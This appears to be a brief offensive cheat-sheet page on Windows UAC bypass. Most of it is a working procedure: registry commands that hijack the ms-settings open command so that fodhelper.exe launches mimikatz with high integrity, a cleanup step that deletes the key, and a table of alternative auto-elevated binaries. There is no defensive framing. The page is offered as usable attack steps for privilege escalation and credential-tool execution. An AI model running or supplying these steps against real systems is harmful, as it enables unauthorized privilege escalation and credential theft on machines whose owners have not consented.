UAC Bypass

What is UAC?

User Account Control (UAC) limits application privileges even for local admins. Admin actions require user confirmation. A UAC bypass avoids this prompt and runs code with high-integrity privileges.

Some auto-elevated Windows binaries (like fodhelper.exe) can be tricked into executing commands from registry keys without a UAC prompt.

Bypass Steps

Step 1: Set Registry Keys

reg add "HKCU\Software\Classes\ms-settings\shell\open\command" /d "C:\Temp\mimikatz.exe" /f
reg add "HKCU\Software\Classes\ms-settings\shell\open\command" /v "DelegateExecute" /f

Step 2: Trigger Payload

C:\Windows\System32\fodhelper.exe

Step 3: Clean Up

reg delete "HKCU\Software\Classes\ms-settings" /f

success

We can verify using privilege::debug.

Other Auto-Elevated Binaries

Binary	Notes
`fodhelper.exe`	Most reliable
`sdclt.exe`	Windows 10 only
`computerdefaults.exe`	Alternate option

What is UAC?​

Bypass Steps​

Other Auto-Elevated Binaries​

What is UAC?

Bypass Steps

Other Auto-Elevated Binaries